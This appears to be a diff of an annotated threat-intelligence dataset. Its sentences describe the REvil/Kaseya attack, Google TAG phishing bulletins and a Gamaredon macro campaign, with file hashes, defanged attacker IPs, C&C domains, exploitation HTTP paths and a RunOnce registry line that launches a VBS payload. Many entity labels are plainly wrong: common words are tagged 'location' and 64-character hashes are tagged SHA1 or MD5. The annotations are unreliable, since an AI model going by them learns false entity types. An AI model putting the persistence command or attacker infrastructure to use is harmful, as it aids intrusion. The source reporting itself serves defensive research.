conducted.","entities":[],"relations":[],"Comments":[]} -{"id":6688,"text":" Multiple sources have stated that the following three files were used to install and execute the ransomware attack on Windows systems: agent.exe | d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e mpsvc.dll | e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 mpsvc.dll | 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd Palo Alto Networks WildFire, Threat Prevention and Cortex XDR detect and prevent REvil ransomware infections.","entities":[{"id":20751,"label":"location","start_offset":83,"end_offset":86},{"id":20752,"label":"SHA1","start_offset":151,"end_offset":215},{"id":20753,"label":"SHA2","start_offset":228,"end_offset":292},{"id":20754,"label":"SHA1","start_offset":306,"end_offset":370},{"id":20755,"label":"identity","start_offset":372,"end_offset":390},{"id":20756,"label":"malware","start_offset":391,"end_offset":399},{"id":20757,"label":"location","start_offset":419,"end_offset":422},{"id":20758,"label":"tools","start_offset":423,"end_offset":433},{"id":20759,"label":"location","start_offset":441,"end_offset":444},{"id":20760,"label":"tools","start_offset":453,"end_offset":458}],"relations":[],"Comments":[]} -{"id":6689,"text":" As more information becomes available on the nature of this attack, we will update this brief to provide additional details. d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 Source: Incident Overview and Technical Details, Kaseya 35.226.94[.]113 161.35.239[.]148 162.253.124[.]162 POST \/dl.asp curl\/7.69.1 GET \/done.asp curl\/7.69.1 POST \/cgi-bin\/KUpload.dll curl\/7.69.1 GET \/done.asp curl\/7.69.1 POST \/cgi-bin\/KUpload.dll curl\/7.69.1 POST \/userFilterTableRpt.asp curl\/7.69.1 Understanding REvil: The Ransomware Gang Behind the Kaseya Attack Threat Assessment: GandCrab and REvil Ransomware 2021 Unit 42 Ransomware Threat Report Breaking Down Ransomware Attacks Ransomware’s New Trend: Exfiltration and Extortion Updated July 6, 2021, at 3:06 p.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":20761,"label":"location","start_offset":72,"end_offset":76},{"id":20762,"label":"SHA1","start_offset":128,"end_offset":192},{"id":20763,"label":"SHA2","start_offset":193,"end_offset":257},{"id":20764,"label":"MD5","start_offset":258,"end_offset":322},{"id":20765,"label":"attack-pattern","start_offset":324,"end_offset":330},{"id":20766,"label":"location","start_offset":350,"end_offset":353},{"id":20767,"label":"IPV4","start_offset":381,"end_offset":396},{"id":20768,"label":"IPV4","start_offset":397,"end_offset":413},{"id":20769,"label":"IPV4","start_offset":414,"end_offset":431},{"id":20770,"label":"location","start_offset":433,"end_offset":437},{"id":20771,"label":"location","start_offset":484,"end_offset":488},{"id":20772,"label":"location","start_offset":548,"end_offset":552},{"id":20773,"label":"location","start_offset":586,"end_offset":590},{"id":20774,"label":"tools","start_offset":642,"end_offset":647},{"id":20776,"label":"malware","start_offset":714,"end_offset":722},{"id":20777,"label":"location","start_offset":723,"end_offset":726},{"id":20778,"label":"threat-actor","start_offset":727,"end_offset":732},{"id":20780,"label":"identity","start_offset":750,"end_offset":757},{"id":20781,"label":"location","start_offset":855,"end_offset":858},{"id":20783,"label":"location","start_offset":886,"end_offset":890},{"id":20784,"label":"TIME","start_offset":895,"end_offset":907},{"id":20785,"label":"location","start_offset":972,"end_offset":975},{"id":20786,"label":"location","start_offset":1001,"end_offset":1006}],"relations":[],"Comments":[]} -{"id":6691,"text":"On any given day, Google's Threat Analysis Group (TAG) is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[],"relations":[],"Comments":[]} -{"id":6692,"text":"Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.","entities":[{"id":20794,"label":"location","start_offset":21,"end_offset":24},{"id":20795,"label":"location","start_offset":25,"end_offset":33},{"id":20796,"label":"location","start_offset":68,"end_offset":71},{"id":20797,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":20799,"label":"location","start_offset":138,"end_offset":141},{"id":20801,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} -{"id":6693,"text":"Today, we’re sharing recent findings on government-backed phishing, threats and disinformation, as well as a new bulletin to share information about actions we take against accounts that we attribute to coordinated influence campaigns.","entities":[{"id":20803,"label":"attack-pattern","start_offset":58,"end_offset":66},{"id":20804,"label":"location","start_offset":76,"end_offset":79}],"relations":[],"Comments":[]} -{"id":6694,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} -{"id":6695,"text":"Generally, 2020 has been dominated by COVID-19.","entities":[],"relations":[],"Comments":[]} -{"id":6699,"text":"And as others have reported, we’re seeing a resurgence in COVID-related hacking and phishing attempts from numerous commercial and government-backed attackers.","entities":[{"id":20818,"label":"location","start_offset":0,"end_offset":3},{"id":20819,"label":"location","start_offset":80,"end_offset":83},{"id":20820,"label":"attack-pattern","start_offset":84,"end_offset":92},{"id":20821,"label":"location","start_offset":127,"end_offset":130}],"relations":[],"Comments":[]} -{"id":6704,"text":"To help protect users against these kinds of tracks, our Advanced Protection Program (APP) utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":20847,"label":"location","start_offset":66,"end_offset":76},{"id":20848,"label":"location","start_offset":109,"end_offset":117},{"id":20849,"label":"location","start_offset":123,"end_offset":126},{"id":20850,"label":"attack-pattern","start_offset":180,"end_offset":188},{"id":20851,"label":"location","start_offset":189,"end_offset":192}],"relations":[],"Comments":[]} -{"id":6705,"text":"APP was designed specifically for high-risk accounts.","entities":[],"relations":[],"Comments":[]} -{"id":6707,"text":"Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.","entities":[{"id":20855,"label":"location","start_offset":13,"end_offset":16},{"id":20856,"label":"location","start_offset":47,"end_offset":55},{"id":20858,"label":"attack-pattern","start_offset":97,"end_offset":105},{"id":20859,"label":"location","start_offset":106,"end_offset":109},{"id":20860,"label":"threat-actor","start_offset":110,"end_offset":114},{"id":20861,"label":"location","start_offset":203,"end_offset":206},{"id":20862,"label":"location","start_offset":242,"end_offset":245},{"id":20863,"label":"malware","start_offset":246,"end_offset":250}],"relations":[],"Comments":[]} -{"id":6717,"text":"We will also continue to share more detailed analysis of vulnerabilities we find, phishing and malware campaigns that we see, and other interesting or noteworthy trends across this space.","entities":[{"id":20916,"label":"location","start_offset":3,"end_offset":7},{"id":20917,"label":"attack-pattern","start_offset":82,"end_offset":90},{"id":20918,"label":"location","start_offset":91,"end_offset":94},{"id":20919,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} -{"id":6718,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6719,"text":"It was last updated on May 27, 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6720,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} -{"id":6722,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} -{"id":6739,"text":"Google’s Threat Analysis Group (TAG) is a specialized team of security experts that works to identify, report, and stop government-backed phishing and hacking against Google and the people who use our products.","entities":[{"id":21021,"label":"location","start_offset":62,"end_offset":70},{"id":21022,"label":"location","start_offset":111,"end_offset":114},{"id":21023,"label":"location","start_offset":115,"end_offset":119},{"id":21024,"label":"attack-pattern","start_offset":138,"end_offset":146},{"id":21025,"label":"location","start_offset":147,"end_offset":150},{"id":21027,"label":"location","start_offset":174,"end_offset":177}],"relations":[],"Comments":[]} -{"id":6742,"text":"One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging.","entities":[{"id":21033,"label":"location","start_offset":12,"end_offset":20},{"id":21034,"label":"location","start_offset":34,"end_offset":40},{"id":21036,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21038,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} -{"id":6744,"text":"Once people clicked on the emails, they were presented with phishing pages designed to trick them into providing their Google account credentials.","entities":[{"id":21042,"label":"attack-pattern","start_offset":60,"end_offset":68},{"id":21043,"label":"location","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} -{"id":6745,"text":"The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.","entities":[{"id":21045,"label":"tools","start_offset":4,"end_offset":8},{"id":21046,"label":"location","start_offset":71,"end_offset":75},{"id":21047,"label":"location","start_offset":83,"end_offset":87},{"id":21048,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} -{"id":6747,"text":"We’ve also seen attackers try to trick people into downloading malware by impersonating health organizations: Generally, we’re not seeing an overall rise in phishing attacks by government-backed groups; this is just a change in tactics.","entities":[{"id":21051,"label":"location","start_offset":141,"end_offset":148},{"id":21052,"label":"attack-pattern","start_offset":157,"end_offset":165},{"id":21053,"label":"identity","start_offset":211,"end_offset":215}],"relations":[],"Comments":[]} -{"id":6749,"text":"While it’s not unusual to see some fluctuations in these numbers, it could be that attackers, just like many other organizations, are experiencing productivity lags and issues due to global lockdowns and quarantine efforts.","entities":[{"id":21059,"label":"identity","start_offset":94,"end_offset":98},{"id":21060,"label":"location","start_offset":104,"end_offset":108},{"id":21061,"label":"location","start_offset":130,"end_offset":133},{"id":21062,"label":"location","start_offset":165,"end_offset":168},{"id":21063,"label":"location","start_offset":200,"end_offset":203}],"relations":[],"Comments":[]} -{"id":6753,"text":"Our teams continue to track these and stop them before they reach people—and we’ll continue to share new and interesting findings.","entities":[{"id":21078,"label":"location","start_offset":34,"end_offset":37},{"id":21079,"label":"malware","start_offset":38,"end_offset":42},{"id":21080,"label":"location","start_offset":43,"end_offset":47},{"id":21081,"label":"location","start_offset":73,"end_offset":76},{"id":21082,"label":"location","start_offset":105,"end_offset":108}],"relations":[],"Comments":[]} -{"id":6756,"text":"From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group’s activities.","entities":[],"relations":[],"Comments":[]} -{"id":6757,"text":" In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics.","entities":[],"relations":[],"Comments":[]} -{"id":6760,"text":"A brief history of Gamaredon In 2015, researchers from LookingGlass published the first report on Gamaredon.","entities":[],"relations":[],"Comments":[]} -{"id":6762,"text":"The report also described Gamaredon’s political beginnings, particularly its ties to the Ukrainian revolution in 2014.","entities":[],"relations":[],"Comments":[]} -{"id":6764,"text":"They moved on to Ukrainian government institutions after the revolution.","entities":[],"relations":[],"Comments":[]} +{"id":2421,"text":"This means that web users can get a class object remotely by simply submitting a URL as shown in Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":4044,"text":"Fortunately, we were still able to collect the decryption key in some cases and we decrypted the payload successfully.","entities":[],"relations":[],"Comments":[]} {"id":6765,"text":"In 2018, CERT-UA published an advisory against the malware Pterodo, which the group allegedly used.","entities":[],"relations":[],"Comments":[]} -{"id":6766,"text":"The group remained active, with several Gamaredon-related activities reported in February 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6767,"text":"In March, they were among the threat groups that were identified taking advantage of the coronavirus pandemic to trick targets.","entities":[],"relations":[],"Comments":[]} -{"id":6771,"text":"Opening document starts a template injection technique for loading the document template from the internet.","entities":[],"relations":[],"Comments":[]} -{"id":6772,"text":"The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS).","entities":[],"relations":[],"Comments":[]} -{"id":6775,"text":"The attacks we found all arrived through targeted emails (MITRE ATT&CK framework ID T1193).","entities":[],"relations":[],"Comments":[]} -{"id":6778,"text":"The email that used the coronavirus-related subject came with an attached document file.","entities":[],"relations":[],"Comments":[]} -{"id":6779,"text":"Opening this file (MITRE ATT&CK framework ID T1204) executes the template injection method (MITRE ATT&CK framework ID T1221).","entities":[],"relations":[],"Comments":[]} -{"id":6780,"text":" Figure 2. Code for downloading the document template with the malicious macro","entities":[],"relations":[],"Comments":[]} -{"id":6785,"text":"As mentioned, the template contains malicious macro (MITRE ATT&CK framework ID T1064), which exports VBS (MITRE ATT&CK framework ID T1064) to execute itself.","entities":[],"relations":[],"Comments":[]} -{"id":6788,"text":"This particular behavior is a slight departure from previously reported attacks by Gamaredon, which did not use this technique.","entities":[],"relations":[],"Comments":[]} -{"id":6789,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":6793,"text":"Registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\MediaPlayer wscript.exe \/\/b %USERPROFILE%\\Documents\\MediaPlayer\\PlayList.vbs","entities":[{"id":21151,"label":"REGISTRYKEY","start_offset":10,"end_offset":89}],"relations":[],"Comments":[]} -{"id":6794,"text":"Connect with “hxxp:\/\/ kristom[.]hopto[.]org \/{computer name}_{hexadecimal volume serious number}\/help_05_03[.]php” (MITRE ATT&CK framework IDs T1043, T1071, T1082)","entities":[],"relations":[],"Comments":[]} -{"id":6795,"text":"If the downloaded file size in the first step exceeds 10,485 bytes, then the file is saved as “%APPDATA%\\\\Microsoft\\Windows\\Cookies.txt” (MITRE ATT&CK framework ID T1105)","entities":[],"relations":[],"Comments":[]} -{"id":6796,"text":"Use XOR for the file saved from the second step, where ASCII code converted from its own hexadecimal volume serial number is used as the key.","entities":[],"relations":[],"Comments":[]} -{"id":6797,"text":"The decrypted result is saved as “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” (T1001)","entities":[],"relations":[],"Comments":[]} -{"id":6798,"text":"If the file size of “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” exceeds 4,485 bytes, it is executed.","entities":[],"relations":[],"Comments":[]} -{"id":6801,"text":"Interestingly, after decoding the VBS, we saw what appeared to be a programming mistake by the attacker.","entities":[],"relations":[],"Comments":[]} -{"id":6803,"text":"If, however, these lines do not pass through this IF statement, an error would occur.","entities":[],"relations":[],"Comments":[]} -{"id":6807,"text":" Network destination for template injection: 176[.]119[.]147[.]225 Network destination for VBS: 176[.]57[.]215[.]115 These IP addresses are from Russian hosting companies.","entities":[{"id":21172,"label":"IPV4","start_offset":45,"end_offset":66},{"id":21173,"label":"IPV4","start_offset":96,"end_offset":116},{"id":21174,"label":"location","start_offset":137,"end_offset":140}],"relations":[],"Comments":[]} -{"id":6810,"text":" hxxp:\/\/{FQDN}\/{computer name}_{hexadecimal volume serial number}\/help_{day}_{month}[.]php Conclusion Gameradon is not the first group to take advantage of the Covid-19 topic.","entities":[],"relations":[],"Comments":[]} -{"id":6814,"text":"Be especially wary of unsolicited emails, that come from unknown senders.","entities":[],"relations":[],"Comments":[]} -{"id":6816,"text":"Avoid activating macro for any attached Microsoft Office files, especially for emails that request macro activation using an image of the body of the opened file or those that don’t show anything.","entities":[],"relations":[],"Comments":[]} -{"id":6822,"text":"Trend Micro™ Hosted Email Securityis a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":21211,"label":"location","start_offset":54,"end_offset":59},{"id":21212,"label":"location","start_offset":104,"end_offset":114},{"id":21213,"label":"malware","start_offset":118,"end_offset":122},{"id":21214,"label":"attack-pattern","start_offset":138,"end_offset":152},{"id":21215,"label":"location","start_offset":166,"end_offset":169}],"relations":[],"Comments":[]} -{"id":6828,"text":"Indicators of Compromise (IoCs) DOCX file SHA256 Detection Name 0d90fe36866ee30eb5e4fd98583bc2fdb5b7da37e42692f390ac5f807a13f057 W97M_CVE20170199.ZYHC-A 036c2088cb48215f21d4f7d751d750b859d57018c04f6cadd45c0c4fee23a9f8 Trojan.W97M.CVE20170199.PG 19d03a25af5b71e859561ff8ccc0a073acb9c61b987bdb28395339f72baf46b4 Trojan.XML.PHISH.AE 62cf22f840fffd8d8781e52b492b03b4efc835571b48823b07535d52b182e861 W97M_CVE20170199.ZKHC-A 8310d39aa1cdd13ca82c769d61049310f8ddaea7cd2c3b940a8a3c248e5e7b06 Trojan.W97M.CVE20170199.PF 84e0b1d94a43c87de55c000e3acae17f4493a57badda3b27146ad8ed0f90c93e Trojan.W97M.CVE20170199.PG 85267e52016b6124e4e42f8b52e68475174c8a2bdf0bc0b501e058e2d388a819 Trojan.W97M.CVE20170199.PF b6a94f565d482906be7da4d801153eb4dab46d92f43be3e1d59ddd2c7f328109 Trojan.W97M.CVE20170199.PF cc775e3cf1a64effa55570715b73413c3ea3a6b47764a998b1272b5be059c25b Trojan.W97M.CVE20170199.PF DOT file SHA256 Detection Name TrendX 00b761bce25594da4c760574d224589daf01086c5637042982767a13a2f61bea Mal_OLEMAL-4 Downloader.VBA.TRX.XXVBAF01FF007 250b09f87fe506fbc6cedf9dbfcb594f7795ed0e02f982b5837334f09e8a184b Mal_OLEMAL-4 4b3ae36b04d6aba70089cb2099e6bc1ba16d16ea24bbf09992f23260151b9faf Mal_OLEMAL-4 946405e2f26e1cc0bd22bc7e12d403da939f02e9c4d8ddd012f049cf4bf1fda9 Mal_OLEMAL-4 9cd5fa89d579a664c28da16064057096a5703773cef0a079f228f21a4b7fd5d2 Mal_OLEMAL-4 c089ccd376c9a4d5e5bdd553181ab4821d2c26fefc299cce7a4f023a660484d5 Mal_OLEMAL-4 e888b5e657b41d45ef0b2ed939e27ff9ea3a11c46946e31372cf26d92361c012 W97M_VBSDOWNLDR.ZKHC-A f577d2b97963b717981c01b535f257e03688ff4a918aa66352aa9cd31845b67d W97M_VBSDOWNLDR.ZYHC-A SHA256 Detection Name TrendX 17161e0ab3907f637c2202a384de67fca49171c79b1b24db7c78a4680637e3d5 Trojan.X97M.CVE201711882.THCOCBO Downloader.VBA.TRX.XXVBAF01FF006 29367502e16bf1e2b788705014d0142d8bcb7fcc6a47d56fb82d7e333454e923 TrojanSpy.Win32.FAREIT.UHBAZCLIZ N\/A 315e297ac510f3f2a60176f9c12fcf92681bbad758135767ba805cdea830b9ee Trojan.X97M.CVE201711882.THCOCBO Downloader.VBA.TRX.XXVBAF01FF006 3e6166a6961bc7c23d316ea9bca87d8287a4044865c3e73064054e805ef5ca1a Backdoor.Win32.REMCOS.USMANEAGFG Troj.Win32.TRX.XXPE50FFF034 3f40d4a0d0fe1eea58fa1c71308431b5c2ce6e381cacc7291e501f4eed57bfd2 Trojan.MSIL.AGENTTESLA.THCOCBO N\/A ab533d6ca0c2be8860a0f7fbfc7820ffd595edc63e540ff4c5991808da6a257d Trojan.X97M.CVE201711882.THCOCBO N\/A b78a3d21325d3db7470fbf1a6d254e23d349531fca4d7f458b33ca93c91e61cd Backdoor.Win32.REMCOS.USMANEAGFE Troj.Win32.TRX.XXPE50FFF034 c9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd TrojanSpy.Win32.FAREIT.UHBAZCLIZ Troj.Win32.TRX.XXPE50FFF034 C&C addresses Bambinos[.]bounceme[.]net bbtt[.]site bbtt[.]space harpa[.]site harpa[.]space harpa[.]website himym[.]site kristoffer[.]hopto[.]org kristom[.]hopto[.]org miragena[.]site miragena[.]xyz papir[.]hopto[.]org sabdja[.]3utilities[.]com sakira[.]3utilities[.]com seliconos[.]3utilities[.]com solod[.]bounceme[.]net sonik[.]hopto[.]org tele[.]3utilities[.]com violina[.]website voyager[.]myftp[.]biz voyaget[.]myftp[.]biz Mitre ATT&CK Framework Tags Malware | APT & Targeted Attacks | Research | Spam | Articles, News, Reports","entities":[{"id":21240,"label":"SHA1","start_offset":65,"end_offset":129},{"id":21241,"label":"MD5","start_offset":154,"end_offset":218},{"id":21242,"label":"SHA1","start_offset":246,"end_offset":310},{"id":21243,"label":"SHA1","start_offset":331,"end_offset":395},{"id":21244,"label":"SHA1","start_offset":420,"end_offset":484},{"id":21245,"label":"SHA1","start_offset":512,"end_offset":576},{"id":21246,"label":"SHA2","start_offset":604,"end_offset":668},{"id":21247,"label":"SHA2","start_offset":696,"end_offset":760},{"id":21248,"label":"MD5","start_offset":788,"end_offset":852},{"id":21249,"label":"location","start_offset":885,"end_offset":888},{"id":21250,"label":"SHA2","start_offset":923,"end_offset":987},{"id":21251,"label":"SHA2","start_offset":1034,"end_offset":1098},{"id":21252,"label":"SHA2","start_offset":1112,"end_offset":1176},{"id":21253,"label":"SHA2","start_offset":1190,"end_offset":1254},{"id":21254,"label":"SHA2","start_offset":1268,"end_offset":1332},{"id":21255,"label":"MD5","start_offset":1346,"end_offset":1410},{"id":21256,"label":"SHA2","start_offset":1424,"end_offset":1488},{"id":21257,"label":"SHA1","start_offset":1512,"end_offset":1576},{"id":21258,"label":"SHA1","start_offset":1634,"end_offset":1698},{"id":21259,"label":"SHA1","start_offset":1765,"end_offset":1829},{"id":21260,"label":"SHA2","start_offset":1867,"end_offset":1931},{"id":21261,"label":"SHA1","start_offset":1998,"end_offset":2062},{"id":21262,"label":"SHA1","start_offset":2124,"end_offset":2188},{"id":21263,"label":"SHA2","start_offset":2224,"end_offset":2288},{"id":21264,"label":"SHA2","start_offset":2326,"end_offset":2390},{"id":21265,"label":"SHA2","start_offset":2452,"end_offset":2516},{"id":21266,"label":"location","start_offset":3060,"end_offset":3063}],"relations":[],"Comments":[]} -{"id":6829,"text":"On any given day, Google's Threat Analysis Group (TAG) is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[],"relations":[],"Comments":[]} -{"id":6830,"text":"Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.","entities":[{"id":21272,"label":"location","start_offset":21,"end_offset":24},{"id":21273,"label":"location","start_offset":25,"end_offset":33},{"id":21274,"label":"location","start_offset":68,"end_offset":71},{"id":21275,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21277,"label":"location","start_offset":138,"end_offset":141},{"id":21279,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} -{"id":6831,"text":"Today, we’re sharing recent findings on government-backed phishing, threats and disinformation, as well as a new bulletin to share information about actions we take against accounts that we attribute to coordinated influence campaigns.","entities":[{"id":21281,"label":"attack-pattern","start_offset":58,"end_offset":66},{"id":21282,"label":"location","start_offset":76,"end_offset":79}],"relations":[],"Comments":[]} -{"id":6832,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} -{"id":6833,"text":"Generally, 2020 has been dominated by COVID-19.","entities":[],"relations":[],"Comments":[]} -{"id":6837,"text":"And as others have reported, we’re seeing a resurgence in COVID-related hacking and phishing attempts from numerous commercial and government-backed attackers.","entities":[{"id":21296,"label":"location","start_offset":0,"end_offset":3},{"id":21297,"label":"location","start_offset":80,"end_offset":83},{"id":21298,"label":"attack-pattern","start_offset":84,"end_offset":92},{"id":21299,"label":"location","start_offset":127,"end_offset":130}],"relations":[],"Comments":[]} -{"id":6842,"text":"To help protect users against these kinds of tracks, our Advanced Protection Program (APP) utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":21325,"label":"location","start_offset":66,"end_offset":76},{"id":21326,"label":"location","start_offset":109,"end_offset":117},{"id":21327,"label":"location","start_offset":123,"end_offset":126},{"id":21328,"label":"attack-pattern","start_offset":180,"end_offset":188},{"id":21329,"label":"location","start_offset":189,"end_offset":192}],"relations":[],"Comments":[]} -{"id":6843,"text":"APP was designed specifically for high-risk accounts.","entities":[],"relations":[],"Comments":[]} -{"id":6845,"text":"Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.","entities":[{"id":21333,"label":"location","start_offset":13,"end_offset":16},{"id":21334,"label":"location","start_offset":47,"end_offset":55},{"id":21336,"label":"attack-pattern","start_offset":97,"end_offset":105},{"id":21337,"label":"location","start_offset":106,"end_offset":109},{"id":21338,"label":"threat-actor","start_offset":110,"end_offset":114},{"id":21339,"label":"location","start_offset":203,"end_offset":206},{"id":21340,"label":"location","start_offset":242,"end_offset":245},{"id":21341,"label":"location","start_offset":246,"end_offset":250}],"relations":[],"Comments":[]} -{"id":6855,"text":"We will also continue to share more detailed analysis of vulnerabilities we find, phishing and malware campaigns that we see, and other interesting or noteworthy trends across this space.","entities":[{"id":21394,"label":"location","start_offset":3,"end_offset":7},{"id":21395,"label":"attack-pattern","start_offset":82,"end_offset":90},{"id":21396,"label":"location","start_offset":91,"end_offset":94},{"id":21397,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} -{"id":6856,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6857,"text":"It was last updated on May 27, 2020.","entities":[],"relations":[],"Comments":[]} -{"id":6858,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} -{"id":6860,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} -{"id":6877,"text":"Google’s Threat Analysis Group (TAG) is a specialized team of security experts that works to identify, report, and stop government-backed phishing and hacking against Google and the people who use our products.","entities":[{"id":21499,"label":"location","start_offset":62,"end_offset":70},{"id":21500,"label":"location","start_offset":111,"end_offset":114},{"id":21501,"label":"location","start_offset":115,"end_offset":119},{"id":21502,"label":"attack-pattern","start_offset":138,"end_offset":146},{"id":21503,"label":"location","start_offset":147,"end_offset":150},{"id":21505,"label":"location","start_offset":174,"end_offset":177}],"relations":[],"Comments":[]} -{"id":6880,"text":"One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging.","entities":[{"id":21511,"label":"location","start_offset":12,"end_offset":20},{"id":21512,"label":"location","start_offset":34,"end_offset":40},{"id":21514,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21516,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} -{"id":6882,"text":"Once people clicked on the emails, they were presented with phishing pages designed to trick them into providing their Google account credentials.","entities":[{"id":21520,"label":"attack-pattern","start_offset":60,"end_offset":68},{"id":21521,"label":"location","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} -{"id":6883,"text":"The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.","entities":[{"id":21523,"label":"tools","start_offset":4,"end_offset":8},{"id":21524,"label":"location","start_offset":71,"end_offset":75},{"id":21525,"label":"location","start_offset":83,"end_offset":87},{"id":21526,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} -{"id":6885,"text":"We’ve also seen attackers try to trick people into downloading malware by impersonating health organizations: Generally, we’re not seeing an overall rise in phishing attacks by government-backed groups; this is just a change in tactics.","entities":[{"id":21529,"label":"location","start_offset":141,"end_offset":148},{"id":21530,"label":"attack-pattern","start_offset":157,"end_offset":165},{"id":21531,"label":"identity","start_offset":211,"end_offset":215}],"relations":[],"Comments":[]} -{"id":6887,"text":"While it’s not unusual to see some fluctuations in these numbers, it could be that attackers, just like many other organizations, are experiencing productivity lags and issues due to global lockdowns and quarantine efforts.","entities":[{"id":21537,"label":"identity","start_offset":94,"end_offset":98},{"id":21538,"label":"location","start_offset":104,"end_offset":108},{"id":21539,"label":"location","start_offset":130,"end_offset":133},{"id":21540,"label":"location","start_offset":165,"end_offset":168},{"id":21541,"label":"location","start_offset":200,"end_offset":203}],"relations":[],"Comments":[]} -{"id":6893,"text":"Following our November update, today we’re sharing the latest insights to fight phishing, and for security teams, providing more details about our work identifying attacks against zero-day vulnerabilities.","entities":[{"id":21568,"label":"attack-pattern","start_offset":80,"end_offset":88},{"id":21569,"label":"location","start_offset":90,"end_offset":93},{"id":21570,"label":"location","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} -{"id":6894,"text":" We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":21572,"label":"location","start_offset":11,"end_offset":15},{"id":21573,"label":"location","start_offset":90,"end_offset":96},{"id":21574,"label":"attack-pattern","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} -{"id":6895,"text":"In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018.","entities":[],"relations":[],"Comments":[]} -{"id":6897,"text":" We’ve detected a few emerging trends in recent months.","entities":[],"relations":[],"Comments":[]} -{"id":6898,"text":"Upon reviewing phishing attempts since the beginning of this year, we’ve seen a rising number of attackers, including those from Iran and North Korea, impersonating news outlets or journalists.","entities":[{"id":21584,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":21587,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} -{"id":6899,"text":"For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation.","entities":[],"relations":[],"Comments":[]} -{"id":6903,"text":"The chart below details the Russian threat actor group SANDWORM’s targeting efforts (by sector) over the last three years.","entities":[],"relations":[],"Comments":[]} -{"id":6904,"text":"In 2019, one in five accounts that received a warning was targeted multiple times by attackers.","entities":[],"relations":[],"Comments":[]} -{"id":6907,"text":"APP provides the strongest protections available against phishing and account hijacking and is specifically designed for the highest-risk accounts.","entities":[{"id":21606,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":21607,"label":"location","start_offset":66,"end_offset":69},{"id":21608,"label":"location","start_offset":88,"end_offset":91}],"relations":[],"Comments":[]} -{"id":6914,"text":"Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":6916,"text":"The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing 